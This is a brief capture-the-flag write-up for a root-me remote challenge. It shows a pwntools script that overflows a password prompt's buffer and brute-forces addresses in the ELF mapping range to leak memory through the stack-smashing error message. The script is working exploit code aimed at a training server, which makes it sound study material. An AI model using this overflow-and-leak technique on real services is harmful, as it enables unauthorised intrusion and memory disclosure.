root-me
There was no binary file given .. it was running in a port asking for password
By default ELF binaries are mapped at 0x08048000
So, I tried to bruteforce the layout 0x08048fff-0x08048000
from pwn import *
for i in xrange(0x08048ffe, 0x08048000, -0x2):
c = remote("challenge03.root-me.org",56529)
c.recvuntil("service: ")
c.send('A'*256 + 'B'*168 + p32(i))
try:
c.recvuntil("*** stack smashing detected ***:")
print "[" + hex(i) + "]" + c.recvuntil("terminated")[:-10]
except:
#print "[-] crash"
None
print "end ..."
For Further references LINK